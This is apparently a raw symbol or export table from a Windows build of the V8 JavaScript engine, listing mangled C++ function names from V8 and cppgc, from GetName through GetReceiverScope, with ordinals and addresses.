                                                                                                                                                                                                                                    ?GetName@HeapGraphNode@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ76990x140c86cd0
                                                                                                                                                                                                                                    ?GetName@HeapObjectHeader@internal@cppgc@@QEBA?AUHeapObjectName@23@XZ77000x14051a690
                                                                                                                                                                                                                                    ?GetName@LookupIterator@internal@v8@@QEAA?AV?$Handle@VName@internal@v8@@@23@XZ77010x1405408f0
                                                                                                                                                                                                                                    ?GetName@ProfilerListener@internal@v8@@QEAAPEBDH@Z77020x14085d390
                                                                                                                                                                                                                                    ?GetName@ProfilerListener@internal@v8@@QEAAPEBDPEBD@Z77030x14085d3a0
                                                                                                                                                                                                                                    ?GetName@ProfilerListener@internal@v8@@QEAAPEBDV?$Vector@$$CBD@base@3@@Z77040x140863a60
                                                                                                                                                                                                                                    ?GetName@ProfilerListener@internal@v8@@QEAAPEBDVName@23@@Z77050x14085d3b0
                                                                                                                                                                                                                                    ?GetName@StringsStorage@internal@v8@@QEAAPEBDH@Z77060x14085e7e0
                                                                                                                                                                                                                                    ?GetName@StringsStorage@internal@v8@@QEAAPEBDVName@23@@Z77070x14085e7f0
                                                                                                                                                                                                                                    ?GetNameFeedback@JSHeapBroker@compiler@internal@v8@@QEAA?AV?$Optional@VNameRef@compiler@internal@v8@@@base@4@AEBVFeedbackNexus@34@@Z77080x1410b7540
                                                                                                                                                                                                                                    ?GetNameFromTypeSignature@NameTraitBase@internal@cppgc@@KA?AUHeapObjectName@23@PEBD@Z77090x14050e920
                                                                                                                                                                                                                                    ?GetNameOrNull@ModuleWireBytes@wasm@internal@v8@@QEBA?AV?$Vector@$$CBD@base@4@PEBUWasmFunction@234@PEBUWasmModule@234@@Z77100x14062ec90
                                                                                                                                                                                                                                    ?GetNameOrNull@ModuleWireBytes@wasm@internal@v8@@QEBA?AV?$Vector@$$CBD@base@4@VWireBytesRef@234@@Z77110x14062ed00
                                                                                                                                                                                                                                    ?GetNativeContextIndexOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAIH@Z77120x140a53570
                                                                                                                                                                                                                                    ?GetNativeFunctionTemplate@Extension@v8@@UEAA?AV?$Local@VFunctionTemplate@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z77130x140097b60
                                                                                                                                                                                                                                    ?GetNearCallTargetForFunction@NativeModule@wasm@internal@v8@@QEBA_KIAEBUJumpTablesRef@1234@@Z77140x140662410
                                                                                                                                                                                                                                    ?GetNearRuntimeStubEntry@NativeModule@wasm@internal@v8@@QEBA_KW4RuntimeStubId@WasmCode@234@AEBUJumpTablesRef@1234@@Z77150x140662440
                                                                                                                                                                                                                                    ?GetNewPages@CompactionSpace@internal@v8@@QEAAAEBV?$vector@PEAVPage@internal@v8@@V?$allocator@PEAVPage@internal@v8@@@std@@@std@@XZ77160x140540a10
                                                                                                                                                                                                                                    ?GetNext@IndexGenerator@internal@v8@@QEAA?AV?$Optional@_K@base@3@XZ77170x140af4b40
                                                                                                                                                                                                                                    ?GetNextByte@EhFrameIterator@internal@v8@@QEAAEXZ77180x140573750
                                                                                                                                                                                                                                    ?GetNextChildId@TopLevelLiveRange@compiler@internal@v8@@QEAAHXZ77190x14109c0a0
                                                                                                                                                                                                                                    ?GetNextFunctionLiteralId@?$ParserBase@VParser@internal@v8@@@internal@v8@@QEAAHXZ77200x14088ed40
                                                                                                                                                                                                                                    ?GetNextIncrementalStepDuration@IncrementalMarkingSchedule@internal@cppgc@@QEAA_K_K@Z77210x140517200
                                                                                                                                                                                                                                    ?GetNextOpcode@EhFrameIterator@internal@v8@@QEAA?AW4DwarfOpcodes@EhFrameConstants@23@XZ77220x140573750
                                                                                                                                                                                                                                    ?GetNextSLeb128@EhFrameIterator@internal@v8@@QEAAHXZ77230x140b9bf30
                                                                                                                                                                                                                                    ?GetNextScriptId@Isolate@internal@v8@@QEAAHXZ77240x140b6ac10
                                                                                                                                                                                                                                    ?GetNextScriptId@LocalIsolate@internal@v8@@QEAAHXZ77250x140b5ffe0
                                                                                                                                                                                                                                    ?GetNextSymbol@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ77260x14088ed50
                                                                                                                                                                                                                                    ?GetNextSymbolForRegExpLiteral@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEBAPEBVAstRawString@23@XZ77270x14088ed50
                                                                                                                                                                                                                                    ?GetNextUInt16@EhFrameIterator@internal@v8@@QEAAGXZ77280x140573760
                                                                                                                                                                                                                                    ?GetNextUInt32@EhFrameIterator@internal@v8@@QEAAIXZ77290x140573770
                                                                                                                                                                                                                                    ?GetNextULeb128@EhFrameIterator@internal@v8@@QEAAIXZ77300x140b9bf80
                                                                                                                                                                                                                                    ?GetNode@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@H@Z77310x140c86d40
                                                                                                                                                                                                                                    ?GetNodeById@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@I@Z77320x140c86d90
                                                                                                                                                                                                                                    ?GetNodeForValues@StateValuesCache@compiler@internal@v8@@QEAAPEAVNode@234@PEAPEAV5234@_KPEBVBytecodeLivenessState@234@@Z77330x1410e0220
                                                                                                                                                                                                                                    ?GetNodeId@CpuProfileNode@v8@@QEBAIXZ77340x1405511a0
                                                                                                                                                                                                                                    ?GetNodeOrigin@NodeOriginTable@compiler@internal@v8@@QEBA?AVNodeOrigin@234@PEAVNode@234@@Z77350x1410f4990
                                                                                                                                                                                                                                    ?GetNodesCount@HeapSnapshot@v8@@QEBAHXZ77360x14088ed30
                                                                                                                                                                                                                                    ?GetNonEvalDeclarationScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ77370x140c65240
                                                                                                                                                                                                                                    ?GetNumLocals@DebugInfo@wasm@internal@v8@@QEAAH_K@Z77380x140658390
                                                                                                                                                                                                                                    ?GetNumberAsSymbol@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ77390x14088ed60
                                                                                                                                                                                                                                    ?GetNumberOfCodeSpacesForTesting@NativeModule@wasm@internal@v8@@QEBA_KXZ77400x140662450
                                                                                                                                                                                                                                    ?GetNumberOfDataSlots@Isolate@v8@@SAIXZ77410x140098330
                                                                                                                                                                                                                                    ?GetNumberOfEmbedderDataFields@Context@v8@@QEAAIXZ77420x140c86da0
                                                                                                                                                                                                                                    ?GetNumberOfRegistersRepresentedBy@Bytecodes@interpreter@internal@v8@@SAHW4OperandType@234@@Z77430x140540a20
                                                                                                                                                                                                                                    ?GetNumberOption@internal@v8@@YA?AV?$Maybe@H@2@PEAVIsolate@12@V?$Handle@VJSReceiver@internal@v8@@@12@V?$Handle@VString@internal@v8@@@12@HHH@Z77440x1408fc2e0
                                                                                                                                                                                                                                    ?GetObjectId@HeapProfiler@v8@@QEAAIPEAX@Z77450x140c86e40
                                                                                                                                                                                                                                    ?GetObjectId@HeapProfiler@v8@@QEAAIV?$Local@VValue@v8@@@2@@Z77460x140c86e50
                                                                                                                                                                                                                                    ?GetObjectId@WebSnapshotSerializer@internal@v8@@AEAAIVJSObject@23@@Z77470x1407b5200
                                                                                                                                                                                                                                    ?GetObjectIterator@LargeObjectSpace@internal@v8@@UEAA?AV?$unique_ptr@VObjectIterator@internal@v8@@U?$default_delete@VObjectIterator@internal@v8@@@std@@@std@@PEAVHeap@23@@Z77480x140af41a0
                                                                                                                                                                                                                                    ?GetObjectIterator@NewSpace@internal@v8@@UEAA?AV?$unique_ptr@VObjectIterator@internal@v8@@U?$default_delete@VObjectIterator@internal@v8@@@std@@@std@@PEAVHeap@23@@Z77490x140ab8070
                                                                                                                                                                                                                                    ?GetObjectIterator@PagedSpace@internal@v8@@UEAA?AV?$unique_ptr@VObjectIterator@internal@v8@@U?$default_delete@VObjectIterator@internal@v8@@@std@@@std@@PEAVHeap@23@@Z77500x140aacd60
                                                                                                                                                                                                                                    ?GetObjectProperty@Runtime@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@11PEA_N@Z77510x14080ecc0
                                                                                                                                                                                                                                    ?GetObjectSizeForGarbageCollected@BaseObjectSizeTrait@internal@cppgc@@KA_KPEBX@Z77520x14050e090
                                                                                                                                                                                                                                    ?GetObjectSizeForGarbageCollectedMixin@BaseObjectSizeTrait@internal@cppgc@@KA_KPEBX@Z77530x14050e0d0
                                                                                                                                                                                                                                    ?GetOffsetToFirstUnusedStackSlot@CallDescriptor@compiler@internal@v8@@QEBAHXZ77540x14102bee0
                                                                                                                                                                                                                                    ?GetOffsetToReturns@CallDescriptor@compiler@internal@v8@@QEBAHXZ77550x14102bf90
                                                                                                                                                                                                                                    ?GetOneByteStringInternal@AstValueFactory@internal@v8@@AEAAPEBVAstRawString@23@V?$Vector@$$CBE@base@3@@Z77560x140c722e0
                                                                                                                                                                                                                                    ?GetOperandOffset@Bytecodes@interpreter@internal@v8@@SAHW4Bytecode@234@HW4OperandScale@234@@Z77570x140a363f0
                                                                                                                                                                                                                                    ?GetOperandSize@Bytecodes@interpreter@internal@v8@@SA?AW4OperandSize@234@W4Bytecode@234@HW4OperandScale@234@@Z77580x140540aa0
                                                                                                                                                                                                                                    ?GetOperandSizes@Bytecodes@interpreter@internal@v8@@SAPEBW4OperandSize@234@W4Bytecode@234@W4OperandScale@234@@Z77590x140540b00
                                                                                                                                                                                                                                    ?GetOperandType@Bytecodes@interpreter@internal@v8@@SA?AW4OperandType@234@W4Bytecode@234@H@Z77600x140540b20
                                                                                                                                                                                                                                    ?GetOperandTypes@Bytecodes@interpreter@internal@v8@@SAPEBW4OperandType@234@W4Bytecode@234@@Z77610x140540b40
                                                                                                                                                                                                                                    ?GetOrComputeFieldType@MapUpdater@internal@v8@@AEAA?AV?$Handle@VFieldType@internal@v8@@@23@V?$Handle@VDescriptorArray@internal@v8@@@23@VInternalIndex@23@W4PropertyLocation@23@VRepresentation@23@@Z77620x14092f9c0
                                                                                                                                                                                                                                    ?GetOrComputeFieldType@MapUpdater@internal@v8@@AEBA?AV?$Handle@VFieldType@internal@v8@@@23@VInternalIndex@23@W4PropertyLocation@23@VRepresentation@23@@Z77630x14092faa0
                                                                                                                                                                                                                                    ?GetOrCreateData@JSHeapBroker@compiler@internal@v8@@QEAAPEAVObjectData@234@V?$Handle@VObject@internal@v8@@@34@V?$Flags@W4GetOrCreateDataFlag@compiler@internal@v8@@H@base@4@@Z77640x1410b75d0
                                                                                                                                                                                                                                    ?GetOrCreateData@JSHeapBroker@compiler@internal@v8@@QEAAPEAVObjectData@234@VObject@34@V?$Flags@W4GetOrCreateDataFlag@compiler@internal@v8@@H@base@4@@Z77650x1410b75e0
                                                                                                                                                                                                                                    ?GetOrCreateDebugInfo@Debug@internal@v8@@QEAA?AV?$Handle@VDebugInfo@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z77660x140bbb580
                                                                                                                                                                                                                                    ?GetOrCreateHash@Object@internal@v8@@QEAA?AVSmi@23@PEAVIsolate@23@@Z77670x14090ee30
                                                                                                                                                                                                                                    ?GetOrCreateIdentityHash@JSReceiver@internal@v8@@QEAA?AVSmi@23@PEAVIsolate@23@@Z77680x140960cf0
                                                                                                                                                                                                                                    ?GetOrCreateParallelMove@Instruction@compiler@internal@v8@@QEAAPEAVParallelMove@234@W4GapPosition@1234@PEAVZone@34@@Z77690x14057f450
                                                                                                                                                                                                                                    ?GetOrCreateRegisterInfo@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@VRegister@234@@Z77700x140a382c0
                                                                                                                                                                                                                                    ?GetOrCreateScript@WasmEngine@wasm@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@34@PEAVIsolate@34@AEBV?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@V?$Vector@$$CBD@base@4@@Z77710x14064d8b0
                                                                                                                                                                                                                                    ?GetOrCreateTurboStatistics@WasmEngine@wasm@internal@v8@@QEAAPEAVCompilationStatistics@34@XZ77720x14064dc10
                                                                                                                                                                                                                                    ?GetOrCreateWasmInternalFunction@WasmInstanceObject@internal@v8@@SA?AV?$Handle@VWasmInternalFunction@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@H@Z77730x140625c30
                                                                                                                                                                                                                                    ?GetOrRegisterRecorderContextId@Isolate@internal@v8@@QEAA?AVContextId@Recorder@metrics@3@V?$Handle@VNativeContext@internal@v8@@@23@@Z77740x140b6ac70
                                                                                                                                                                                                                                    ?GetOsrValueLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@H@Z77750x14102bff0
                                                                                                                                                                                                                                    ?GetOutLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEAAPEAVBytecodeLivenessState@234@H@Z77760x1410e02c0
                                                                                                                                                                                                                                    ?GetOutLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z77770x1410e02c0
                                                                                                                                                                                                                                    ?GetOutLivenessFor@BytecodeAnalysis@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z77780x141247de0
                                                                                                                                                                                                                                    ?GetOuterContext@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@PEA_K@Z77790x141034990
                                                                                                                                                                                                                                    ?GetOuterScopeWithContext@Scope@internal@v8@@QEAAPEAV123@XZ77800x140c65260
                                                                                                                                                                                                                                    ?GetOutputRegisterListOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegisterList@234@@Z77810x140a5e400
                                                                                                                                                                                                                                    ?GetOutputRegisterOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegister@234@@Z77820x140a5e440
                                                                                                                                                                                                                                    ?GetOutputStackFrameType@OptimizedCompilationInfo@internal@v8@@QEBA?AW4Type@StackFrame@23@XZ77830x140be0860
                                                                                                                                                                                                                                    ?GetOverallMarkedBytes@IncrementalMarkingSchedule@internal@cppgc@@QEBA_KXZ77840x140517310
                                                                                                                                                                                                                                    ?GetOverloadResolution@CFunction@v8@@QEAA?AW4OverloadResolution@12@PEBV12@@Z77850x140098c20
                                                                                                                                                                                                                                    ?GetOwnPropertyDescriptor@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@PEAVPropertyDescriptor@23@@Z77860x140960e80
                                                                                                                                                                                                                                    ?GetOwnPropertyDescriptor@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z77870x140c86e60
                                                                                                                                                                                                                                    ?GetOwnPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@@Z77880x140c871e0
                                                                                                                                                                                                                                    ?GetOwnPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@W4PropertyFilter@2@W4KeyConversionMode@2@@Z77890x140c87220
                                                                                                                                                                                                                                    ?GetPCOffset@CodeCommentsIterator@internal@v8@@QEBAIXZ77900x140c0e650
                                                                                                                                                                                                                                    ?GetPageForSize@FreeListMany@internal@v8@@UEAAPEAVPage@23@_K@Z77910x140b1f690
                                                                                                                                                                                                                                    ?GetPageMemory@LargePageMemoryRegion@internal@cppgc@@QEBA?BVPageMemory@23@XZ77920x140504690
                                                                                                                                                                                                                                    ?GetPageMemory@NormalPageMemoryRegion@internal@cppgc@@QEBA?BVPageMemory@23@_K@Z77930x1405046f0
                                                                                                                                                                                                                                    ?GetParallelMove@Instruction@compiler@internal@v8@@QEAAPEAVParallelMove@234@W4GapPosition@1234@@Z77940x14057f4e0
                                                                                                                                                                                                                                    ?GetParallelMove@Instruction@compiler@internal@v8@@QEBAPEBVParallelMove@234@W4GapPosition@1234@@Z77950x14057f4e0
                                                                                                                                                                                                                                    ?GetParameter@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVRegister@234@H@Z77960x140a53770
                                                                                                                                                                                                                                    ?GetParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SAHXZ77970x140098ae0
                                                                                                                                                                                                                                    ?GetParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SAHXZ77980x140098ae0
                                                                                                                                                                                                                                    ?GetParameterCount@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ77990x1400a7da0
                                                                                                                                                                                                                                    ?GetParameterCount@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ78000x140098ae0
                                                                                                                                                                                                                                    ?GetParameterCount@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SAHXZ78010x140098330
                                                                                                                                                                                                                                    ?GetParameterCount@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SAHXZ78020x140098360
                                                                                                                                                                                                                                    ?GetParameterCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ78030x14057f4f0
                                                                                                                                                                                                                                    ?GetParameterCountAfterLowering@Int64Lowering@compiler@internal@v8@@SAHPEAV?$Signature@W4MachineRepresentation@internal@v8@@@34@@Z78040x1410f0790
                                                                                                                                                                                                                                    ?GetParameterLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@H@Z78050x14057f500
                                                                                                                                                                                                                                    ?GetParameterSecondaryLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@H@Z78060x14102c0a0
                                                                                                                                                                                                                                    ?GetParameterType@CallDescriptor@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z78070x14057f540
                                                                                                                                                                                                                                    ?GetParameterType@CallInterfaceDescriptor@internal@v8@@QEBA?AVMachineType@23@H@Z78080x14057f560
                                                                                                                                                                                                                                    ?GetParameterType@Linkage@compiler@internal@v8@@QEBA?AVMachineType@34@H@Z78090x14057f580
                                                                                                                                                                                                                                    ?GetParent@CpuProfileNode@v8@@QEBAPEBV12@XZ78100x1401904e0
                                                                                                                                                                                                                                    ?GetPatch@Version@internal@v8@@SAHXZ78110x14061dd60
                                                                                                                                                                                                                                    ?GetPersistentRegion@StrongCrossThreadPersistentPolicy@internal@cppgc@@SAAEAVCrossThreadPersistentRegion@23@PEBX@Z78120x14050bad0
                                                                                                                                                                                                                                    ?GetPersistentRegion@StrongPersistentPolicy@internal@cppgc@@SAAEAVPersistentRegion@23@PEBX@Z78130x14050baf0
                                                                                                                                                                                                                                    ?GetPersistentRegion@WeakCrossThreadPersistentPolicy@internal@cppgc@@SAAEAVCrossThreadPersistentRegion@23@PEBX@Z78140x14050bb10
                                                                                                                                                                                                                                    ?GetPersistentRegion@WeakPersistentPolicy@internal@cppgc@@SAAEAVPersistentRegion@23@PEBX@Z78150x14050bb30
                                                                                                                                                                                                                                    ?GetPlacement@Scheduler@compiler@internal@v8@@AEAA?AW4Placement@1234@PEAVNode@234@@Z78160x1411d9650
                                                                                                                                                                                                                                    ?GetPlatformPageAllocator@internal@v8@@YAPEAVPageAllocator@2@XZ78170x1407bcb70
                                                                                                                                                                                                                                    ?GetPlatformVirtualAddressSpace@internal@v8@@YAPEAVVirtualAddressSpace@2@XZ78180x1407bcb90
                                                                                                                                                                                                                                    ?GetPosition@WasmFunctionBuilder@wasm@internal@v8@@QEBA_KXZ78190x140634fa0
                                                                                                                                                                                                                                    ?GetPositionInfo@Script@internal@v8@@QEBA_NHPEAUPositionInfo@123@W4OffsetFlag@123@@Z78200x14090f2d0
                                                                                                                                                                                                                                    ?GetPossibleBreakpoints@Debug@internal@v8@@QEAA_NV?$Handle@VScript@internal@v8@@@23@HH_NPEAV?$vector@VBreakLocation@internal@v8@@V?$allocator@VBreakLocation@internal@v8@@@std@@@std@@@Z78210x140bbb680
                                                                                                                                                                                                                                    ?GetPossibleBreakpoints@Script@debug@v8@@QEBA_NAEBVLocation@23@0_NPEAV?$vector@VBreakLocation@debug@v8@@V?$allocator@VBreakLocation@debug@v8@@@std@@@std@@@Z78220x140bcad00
                                                                                                                                                                                                                                    ?GetPossibleBreakpoints@WasmScript@internal@v8@@SA_NPEAVNativeModule@wasm@23@AEBVLocation@debug@3@1PEAV?$vector@VBreakLocation@debug@v8@@V?$allocator@VBreakLocation@debug@v8@@@std@@@std@@@Z78230x1406583e0
                                                                                                                                                                                                                                    ?GetPreviousCodeStartAddress@CodeEvent@v8@@QEAA_KXZ78240x140097e70
                                                                                                                                                                                                                                    ?GetPreviousEventForTesting@StatsCollector@internal@cppgc@@QEBAAEBUEvent@123@XZ78250x14050e910
                                                                                                                                                                                                                                    ?GetPrivate@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VPrivate@v8@@@2@@Z78260x140c87250
                                                                                                                                                                                                                                    ?GetPrivateMembers@debug@v8@@YA_NV?$Local@VContext@v8@@@2@V?$Local@VObject@v8@@@2@PEAV?$vector@V?$Local@VValue@v8@@@v8@@V?$allocator@V?$Local@VValue@v8@@@v8@@@std@@@std@@2@Z78270x140bcb0d0
                                                                                                                                                                                                                                    ?GetProcedureAddressOffset@EhFrameWriter@internal@v8@@AEBAHXZ78280x140573780
                                                                                                                                                                                                                                    ?GetProcedureSizeOffset@EhFrameWriter@internal@v8@@AEBAHXZ78290x140573790
                                                                                                                                                                                                                                    ?GetProcessWideCodeRange@CodeRange@internal@v8@@SA?AV?$shared_ptr@VCodeRange@internal@v8@@@std@@XZ78300x140b48680
                                                                                                                                                                                                                                    ?GetProfile@CpuProfiler@internal@v8@@QEAAPEAVCpuProfile@23@H@Z78310x14087bac0
                                                                                                                                                                                                                                    ?GetProfilesCount@CpuProfiler@internal@v8@@QEAAHXZ78320x14087bbc0
                                                                                                                                                                                                                                    ?GetPromise@Resolver@Promise@v8@@QEAA?AV?$Local@VPromise@v8@@@3@XZ78330x140582830
                                                                                                                                                                                                                                    ?GetPromise@WasmModuleObjectBuilderStreaming@v8@@QEAA?AV?$Local@VPromise@v8@@@2@XZ78340x140097b60
                                                                                                                                                                                                                                    ?GetPromiseOnStackOnThrow@Isolate@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@XZ78350x140b6ae00
                                                                                                                                                                                                                                    ?GetProperty@Object@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVLookupIterator@23@_N@Z78360x14090fb60
                                                                                                                                                                                                                                    ?GetPropertyAccessInfo@JSHeapBroker@compiler@internal@v8@@QEAA?AVPropertyAccessInfo@234@VMapRef@234@VNameRef@234@W4AccessMode@234@PEAVCompilationDependencies@234@@Z78370x1410b7620
                                                                                                                                                                                                                                    ?GetPropertyAttributes@Object@v8@@QEAA?AV?$Maybe@W4PropertyAttribute@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z78380x140c87270
                                                                                                                                                                                                                                    ?GetPropertyCell@LookupIterator@internal@v8@@QEBA?AV?$Handle@VPropertyCell@internal@v8@@@23@XZ78390x140933ac0
                                                                                                                                                                                                                                    ?GetPropertyDetails@MapRef@compiler@internal@v8@@QEBA?AVPropertyDetails@34@VInternalIndex@34@@Z78400x14101a260
                                                                                                                                                                                                                                    ?GetPropertyKey@MapRef@compiler@internal@v8@@QEBA?AVNameRef@234@VInternalIndex@34@@Z78410x14101a310
                                                                                                                                                                                                                                    ?GetPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@@Z78420x140c87480
                                                                                                                                                                                                                                    ?GetPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@W4KeyCollectionMode@2@W4PropertyFilter@2@W4IndexFilter@2@W4KeyConversionMode@2@@Z78430x140c874c0
                                                                                                                                                                                                                                    ?GetProtectedInstructionsData@CodeGenerator@compiler@internal@v8@@QEAA?AV?$OwnedVector@E@base@4@XZ78440x14106de10
                                                                                                                                                                                                                                    ?GetPrototype@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ78450x140c87870
                                                                                                                                                                                                                                    ?GetPrototypeTransition@TransitionsAccessor@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@@Z78460x1408d4360
                                                                                                                                                                                                                                    ?GetPrototypeTransitions@TransitionsAccessor@internal@v8@@CA?AVWeakFixedArray@23@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@@Z78470x1408d4470
                                                                                                                                                                                                                                    ?GetPtrComprCage@Isolate@internal@v8@@QEAAPEAVVirtualMemoryCage@23@XZ78480x140540b50
                                                                                                                                                                                                                                    ?GetPtrComprCage@Isolate@internal@v8@@QEBAPEBVVirtualMemoryCage@23@XZ78490x140540b50
                                                                                                                                                                                                                                    ?GetPtrComprCage@IsolateAllocator@internal@v8@@QEAAPEAVVirtualMemoryCage@23@XZ78500x140098360
                                                                                                                                                                                                                                    ?GetPtrComprCage@IsolateAllocator@internal@v8@@QEBAPEBVVirtualMemoryCage@23@XZ78510x140098360
                                                                                                                                                                                                                                    ?GetPtrComprCageBase@IsolateAllocator@internal@v8@@QEBA_KXZ78520x140098360
                                                                                                                                                                                                                                    ?GetPtrComprCodeCageForTesting@Isolate@internal@v8@@QEAAPEAVVirtualMemoryCage@23@XZ78530x140540b50
                                                                                                                                                                                                                                    ?GetPushCompatibleMoves@CodeGenerator@compiler@internal@v8@@CAXPEAVInstruction@234@V?$Flags@W4PushTypeFlag@CodeGenerator@compiler@internal@v8@@H@base@4@PEAV?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@34@@Z78540x14106de80
                                                                                                                                                                                                                                    ?GetRandomMmapAddr@BoundedPageAllocator@base@v8@@UEAAPEAXXZ78550x140ffba50
                                                                                                                                                                                                                                    ?GetRandomMmapAddr@OS@base@v8@@CAPEAXXZ78560x140ff41b0
                                                                                                                                                                                                                                    ?GetRandomMmapAddr@PageAllocator@base@v8@@UEAAPEAXXZ78570x140ff63d0
                                                                                                                                                                                                                                    ?GetRandomMmapAddr@internal@v8@@YAPEAXXZ78580x1407bcc00
                                                                                                                                                                                                                                    ?GetRange@Type@compiler@internal@v8@@QEBA?AV1234@XZ78590x1410278e0
                                                                                                                                                                                                                                    ?GetRangeData@HandlerTable@internal@v8@@QEBAHH@Z78600x140bf9930
                                                                                                                                                                                                                                    ?GetRangeEnd@HandlerTable@internal@v8@@QEBAHH@Z78610x140bf9950
                                                                                                                                                                                                                                    ?GetRangeHandler@HandlerTable@internal@v8@@QEBAHH@Z78620x140bf9970
                                                                                                                                                                                                                                    ?GetRangePrediction@HandlerTable@internal@v8@@AEBA?AW4CatchPrediction@123@H@Z78630x140bf9990
                                                                                                                                                                                                                                    ?GetRangeStart@HandlerTable@internal@v8@@QEBAHH@Z78640x140bf99b0
                                                                                                                                                                                                                                    ?GetRareData@ClassScope@internal@v8@@AEAAPEAURareData@123@XZ78650x1407ff5e0
                                                                                                                                                                                                                                    ?GetRareVariable@DeclarationScope@internal@v8@@AEBAPEAVVariable@23@W4RareVariable@123@@Z78660x1407ff5f0
                                                                                                                                                                                                                                    ?GetRawNameFromIdentifier@Parser@internal@v8@@AEAAPEBVAstRawString@23@PEBV423@@Z78670x140097130
                                                                                                                                                                                                                                    ?GetReadOnlyRoots@ReadOnlyHeap@internal@v8@@SA?AVReadOnlyRoots@23@VHeapObject@23@@Z78680x14052dd70
                                                                                                                                                                                                                                    ?GetRealNamedProperty@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z78690x140c87930
                                                                                                                                                                                                                                    ?GetRealNamedPropertyAttributes@Object@v8@@QEAA?AV?$Maybe@W4PropertyAttribute@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z78700x140c87ce0
                                                                                                                                                                                                                                    ?GetRealNamedPropertyAttributesInPrototypeChain@Object@v8@@QEAA?AV?$Maybe@W4PropertyAttribute@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z78710x140c87eb0
                                                                                                                                                                                                                                    ?GetRealNamedPropertyInPrototypeChain@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z78720x140c88140
                                                                                                                                                                                                                                    ?GetRealStackAddressForSlot@Stack@base@v8@@SA?AUStackSlot@123@U4123@@Z78730x140097ad0
                                                                                                                                                                                                                                    ?GetReceiver@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVRegister@234@XZ78740x140a53790
                                                                                                                                                                                                                                    ?GetReceiver@LookupIterator@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@XZ78750x140540b60
                                                                                                                                                                                                                                    ?GetReceiverMap@LookupIterator@internal@v8@@AEBA?AV?$Handle@VMap@internal@v8@@@23@XZ78760x140933b50
                                                                                                                                                                                                                                    ?GetReceiverMode@Bytecodes@interpreter@internal@v8@@SA?AW4ConvertReceiverMode@34@W4Bytecode@234@@Z78770x140540b70
                                                                                                                                                                                                                                    ?GetReceiverScope@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEBAPEAVDeclarationScope@23@XZ78780x14088f080
                                                                                                                                                                                                                                    ?GetReceiverScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ78790x140c65280
